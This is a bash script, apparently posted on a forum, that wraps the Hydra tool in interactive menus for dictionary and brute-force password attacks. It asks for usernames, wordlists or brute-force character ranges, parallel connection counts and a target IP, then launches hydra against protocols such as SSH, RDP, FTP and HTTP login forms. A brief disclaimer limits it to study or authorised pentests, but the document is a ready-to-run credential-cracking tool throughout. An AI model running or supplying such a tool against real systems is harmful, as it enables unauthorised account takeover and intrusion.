Code:
#!/bin/bash
# PLEASE READ AND STUDY BEFORE LAUNCHING
# --------------------------------------------------------------------------------------------------------------------#
# v0.2 17.06.2012
#
# Copyright (C) 2012 Deviney
# This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation; either version 2 of the License, or any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# --------------------------------------------------------------------------------------------------------------------#
# Disclaimer: This script is intended for use only for private study or during an authorised pentest. The author bears no responsibility for malicious or illegal use.
# I sincerely hope skiddies find it overwhelming. (not very likely tho)
# =========================================================================================== #
# "...On The Shoulders Of Giants..." #
# =================
========================================================================== #
# Large chunks copied directly from VulpiArgenti's PwnSTAR script #
# #
# I only used parts that made the script look user frendly the code
# that does the the work is my own or has been edited to do a diffrent job.
# =========================================================================================== #
# Thanks to VulpiArgenti i used his code as a learning base
# ~~~~~~~~~~ Environment Setup ~~~~~~~~~~ #
# Text color variables - saves retyping these awful ANSI codes
txtrst="\e[0m" # Text reset
def="\e[1;34m" # default blue
warn="\e[1;31m" # warning red
info="\e[1;34m" # info blue
q="\e[1;32m" # questions green
inp="\e[1;36m" # input variables magenta
### 7 characters = 120 pixels?
var=$(ls /etc | grep kde4) # detect KDE
if [[ -z $var ]];then
resize -s 38 85 &> /dev/null # resize the terminal if gnome, not KDE
fi
echo -e "\e[0;40m" # background black
clear
# ~~~~~~~~~~ Intro ~~~~~~~~~~ #
banner_fn()
{
echo -e "\e[1;37m
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Deviney~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
* ** ******* * *
** * ** * *** ** **
** *** ** * ** ** **
** * ** ** * ** **
** ** *** **** *** ** **** **
** *** *** *** ** **** **** * **** ** *** ** *** * *** * ** ***
** * *** *** ********* ** **** * *** * *** *** ** * *** * **** ** * ***
*** *** ** ** **** ** * **** *** *** *** *** ** ** *** *
** ** ** ** ** ** ** ** *** *** ** ** ** ** ** *
** ** ** ** ** ** ** ** ** *** ** ** ** ** ** *
** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
** ** ** ** ** ** ** ** * * ** ** ** ** ******
** ** ** ** ** *** ** ** *** * ** ** ****** ** ***
** ** *** * ***** *** ***** ** * ********* ** ** **** ** *** *
** ** *** *** *** ** * ***** ** ** ** ***
* * *
* ** *
* *
* *
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Hydro_Password_Hack_Script_V_0.2~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"
}
username_options_fn()
{
sleep 2
# Trap Ctrl-C
trap exit_fn INT
username_options=
echo -e "$info Press ctrl-C at any time to exit neatly\n"
sleep 1
echo -e "$q Are we using a a single username or a username list? (list has to be text file)"
sleep 0.5
echo -e "$def
1) A single username
2) A username list (text file)
q) Exit from the script
"
read username_options
if [[ $username_options = q ]];then
exit_fn
elif [[ $username_options = 1 ]];then
sin_user_fn
else
list_user_fn
fi
}
sin_user_fn()
{
clear
banner_fn
usernamesign=
: ${usernamesign:="-l "}
echo -e "$q What is the username we will be using?"
read username
password_options_fn
}
list_user_fn()
{
clear
banner_fn
usernamesign=
: ${usernamesign:="-L "}
echo -e "$q What is the path to your password list? (E.g root/PasswordList.txt"
read username
password_options_fn
}
password_options_fn()
{
clear
banner_fn
password_options=
echo -e "$q Are we using a a single password or a password list? (list has to be text file)"
sleep 0.5
echo -e "$def
1) A single password
2) A password list (text file)
3) A Bruteforce attack
q) Exit from the script
"
read password_options
if [[ $password_options = q ]];then
exit_fn
elif [[ $password_options = 1 ]];then
sin_password_fn
elif [[ $password_options = 2 ]];then
list_password_fn
else
bruteforce_password_fn
fi
}
sin_password_fn()
{
clear
banner_fn
passwordsign=
: ${passwordsign:="-p "}
echo -e "$q What is the password we will be using?"
read password
Task_fn
}
list_password_fn()
{
clear
banner_fn
passwordsign=
: ${passwordsign:="-P "}
echo -e "$q What is the path to your password list? (E.g root/PasswordList.txt"
read password
Task_fn
}
bruteforce_password_fn()
{
clear
banner_fn
brute_min=
brute_max=
brute_char=
: ${passwordsign:="-x"}
: ${passwordsignbreak:=":"}
echo -e "$q What is the min amount of charchters in the password?"
read brute_min
echo -e "$q What is the max amount of charchters in the password?"
read brute_max
echo -e "$q What charcters will be bruteforced? (do not use any space's E.G 'abcdefghi.@123'"
read brute_char
Task_fn
}
Task_fn()
{
clear
banner_fn
task=
echo -e "$q How many parallel connections would you like? (suggest 1-32)"
read task
timeout_fn
}
timeout_fn()
{
clear
banner_fn
timeout=
echo -e "$q How long would you like a connection to wait before being classed as timed out? (suggest 5-30)"
read timeout
ip_address_fn
}
ip_address_fn()
{
clear
banner_fn
ip=
echo -e "$q What is the ip of the target?"
read ip
protcol_fn
}
protcol_fn()
{
clear
banner_fn
protcol=
echo -e " $q What protcol will you be using?? (Enter 'show' to see the protcols available)"
read protcol
if [[ $protcol = show ]];then
show_protcols_fn
else
webpage_fn
fi
}
show_protcols_fn()
{
clear
banner_fn
echo -e "AFP, Cisco AAA, Cisco auth, Cisco enable"
echo -e "CVS, Firebird, FTP, HTTP-FORM-GET"
echo -e "HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY"
echo -e "HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD"
echo -e "HTTP-Proxy, ICQ, IMAP, IRC"
echo -e "LDAP, MS-SQL, MYSQL, NCP"
echo -e "NNTP, Oracle Listener, Oracle, Oracle SID"
echo -e "PC-Anywhere, PCNFS, POP3, POSTGRES"
echo -e "RDP, Rexec, Rlogin, Rsh"
echo -e "SAP/R3, SIP, SMB, SMTP"
echo -e "SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2)"
echo -e "Subversion, Teamspeak (TS2), Telnet, VMware-Auth"
echo -e "VNC, XMPP"
echo -e ""
echo -e "Press enter to return back to the prevouise question"
read
protcol_fn
}
webpage_fn()
{
clear
banner_fn
webpage=
echo -e "$q What is the webpage of the target login screen? (if there is no page after the IP address just enter a backslash '/'"
read webpage
execute_fn
}
execute_fn()
{
clear
banner_fn
if [[ $password_options = [1-2] ]];then
echo -e "$warn hydra $usernamesign$username $passwordsign$password -e nsr -t $task -w $timeout -V $ip $protcol $webpage"
hydra $usernamesign$username $passwordsign$password -e nsr -t $task -w $timeout -V $ip $protcol $webpage
elif [[ $password_options = 3 ]];then
echo -e "$warn hydra $usernamesign$username $passwordsign $brute_min$passwordsignbreak$brute_max$passwordsignbreak$brute_char -e nsr -t $task -w $timeout -V $ip $protcol $webpage"
hydra $usernamesign$username $passwordsign $brute_min$passwordsignbreak$brute_max$passwordsignbreak$brute_char -e nsr -t $task -w $timeout -V $ip $protcol $webpage
fi
}
exit_fn()
{
clear
exit 0
}
# ~~~~~~~~~~ Main Script 2 lines!!! ~~~~~~~~~~ #
banner_fn
username_options_fn
Hydra bruteforce and dictonary attack script.
